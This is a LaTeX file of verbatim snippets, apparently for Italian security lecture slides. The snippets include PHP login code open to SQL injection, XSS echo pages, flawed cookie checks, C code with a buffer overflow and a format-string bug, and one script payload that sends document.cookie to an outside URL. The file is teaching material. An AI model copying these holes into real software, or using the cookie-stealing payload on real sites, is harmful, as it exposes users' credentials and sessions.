Statistics
| Branch: | Revision:

root / mydefs.tex @ master

History | View | Annotate | Download (4.13 KB)

1

    
2
\begin{SaveVerbatim}{magic}
3
; Magic quotes
4
; Magic quotes for incoming GET/POST/Cookie data.
5
magic_quotes_gpc = Off
6
; Magic quotes for runtime-generated data
7
magic_quotes_runtime = Off
8
; Use Sybase-style magic quotes 
9
; (escape ' with '' instead of \').
10
magic_quotes_sybase = Off
11
\end{SaveVerbatim}
12

    
13
\begin{SaveVerbatim}{prepared}
14
$db_connection = new mysqli("localhost", 
15
  "user", "pass", "db");
16
$statement = $db_connection->prepare("
17
   SELECT campo FROM tabella WHERE id = ?");
18
$statement->bind_param("i", $id);
19
$statement->execute();
20
\end{SaveVerbatim}
21

    
22

    
23
      
24
\begin{SaveVerbatim}{ARP-request}
25
16:09:31.478260 arp who-has vedo.lenst-int tell dhcp-32.lenst-int
26
16:09:31.481740 arp reply vedo.lenst-int is-at 00:10:5a:18:68:d8
27
\end{SaveVerbatim}
28

    
29
\begin{SaveVerbatim}{ARP-protocol}
30
?Do I have that hardware type ?
31
Yes: (almost definitely)
32
  ?Do I speak that protocol ?
33
  Yes:
34
    If the pair <protocol type, sender protocol address> is
35
        already in my translation table, update the sender
36
	hardware address field of the entry with the new
37
	information in the packet and set Merge\_flag to true. 
38
    ?Am I the target protocol address?
39
      Yes:
40
        [...]
41
\end{SaveVerbatim}
42

    
43
  
44
\begin{SaveVerbatim}{index}
45
<html>
46
  <form action=retrieve.php method="get">
47
    User: <input type="text" name="user">
48
    <br>
49
    Password: <input type="text" name="pass">
50
    <input type="submit" value="entra">
51
  </form>
52
</html>
53
\end{SaveVerbatim}
54

    
55
\begin{SaveVerbatim}{retrieve}
56

    
57
<?php
58

    
59
$link = mysql_connect('localhost', 'prova');
60
mysql_select_db('sql_inject');
61

    
62
$user = $_GET['user'];
63
$password = $_GET['pass'];
64

    
65
$result = mysql_query("SELECT secret FROM userdb WHERE 
66
                user='$user' AND password='$password'");
67

    
68
$row = mysql_fetch_assoc($result);
69
echo $user."\' Secret is: ". $row['secret']. "\n";
70

    
71
?>
72

    
73
\end{SaveVerbatim}
74

    
75
\begin{SaveVerbatim}{esempio}
76
#include <stdio.h>
77
#include <string.h>
78

    
79
int stampa(char * );
80

    
81
int main(int argc, char ** argv)
82
{
83
	if (argv[1]!=NULL)
84
		stampa(argv[1]);
85
	else 
86
		printf("niente da stampare\n");
87
}
88

    
89
int stampa(char * parola)
90
{
91
	char testo[10];
92
	strcpy(testo, parola);
93
	printf("la parola da stampare e': %s\n", testo);
94

    
95
}
96
\end{SaveVerbatim}
97

    
98
\begin{SaveVerbatim}{index2}
99
<html>
100
<form action=check.php method="get">
101
Scrivi qualcosa : 
102
<input type="text" name="stringa">
103
<input type="submit" value="Ok">
104
</form>
105
</html>
106
\end{SaveVerbatim}
107

    
108

    
109
\begin{SaveVerbatim}{echo}
110
<?php
111
$input = $_GET['stringa'];
112
  echo "Hai scritto: ".$input;
113
?>
114
\end{SaveVerbatim}
115
\begin{SaveVerbatim}{index3}
116
<html>
117
<h4> login </h4>
118
<form action=check.php method="get">
119
User: 
120
<input type="text" name="user">
121
<br>
122
Password: 
123
<input type="text" name="pass">
124
<input type="submit" value="entra">
125
</form>
126
</html>
127

    
128
\end{SaveVerbatim}
129

    
130
\begin{SaveVerbatim}{cookie}
131
<?php
132
if ($_get["user"] = "leonardo")
133
{
134
  setcookie("user", "authorized", time()+3600);
135
  echo "Benvenuto ".$user;
136
# crea un cookie con nome user, e dati relativi all'utente.
137
   echo <<<END
138
    <form action=retrieve.php method="get">
139
    Input: 
140
    <input type="text" name="content">
141
    <br>
142
    <input type="submit" value="Ok">
143
    </form>
144
    END;
145
}
146
else 
147
 echo "L'utente non esiste\n";
148
?>
149
\end{SaveVerbatim}
150
\begin{SaveVerbatim}{check}
151

    
152
<?php
153
if ($_COOKIE["user"] = "authorized")
154
{
155
 $input = $_GET['content'];
156
   echo "Hai scritto: ".$input;
157
 }
158
else 
159
 echo "non hai diritto ad accedere a questa pagina\n"
160

    
161
?>
162

    
163
\end{SaveVerbatim}
164
\begin{SaveVerbatim}{get}
165
<script>window.open('http://google.it?
166
  cookie='+document.cookie)</script>
167
\end{SaveVerbatim}
168

    
169
\begin{SaveVerbatim}{fbug}
170
#include <stdio.h>
171
#include <string.h>
172

    
173
int stampa(char * );
174

    
175
int main(int argc, char ** argv)
176
{
177
	
178
	if (argv[1]!=NULL)
179
		printf(argv[1]);
180
	else 
181
		printf("niente da stampare");
182
	printf("\n");
183
}
184
\end{SaveVerbatim}
185

    
186
\begin{SaveVerbatim}{out1}
187
leonardo@ciclope\$ ./esempio "\%x \%x"
188
8049ff4 bfae9ee8
189
\end{SaveVerbatim}
190

    
191

    
192
\begin{SaveVerbatim}{out2}
193
leonardo@ciclope\$ ./esempio "aaaaa \%x \%x"
194
aaaaa 8049ff4 bfae9ee8
195
\end{SaveVerbatim}
196
\begin{SaveVerbatim}{out3}
197
int pos, x = 235, y = 93;
198
printf("\%d \%n\%d\n", x, &pos, y);
199
printf("The offset was \%d\n", pos);
200
\end{SaveVerbatim}
201

    
202
\begin{SaveVerbatim}{out4}
203
printf("\%.50d \%n\%d\n", x, &pos, y);
204
\end{SaveVerbatim}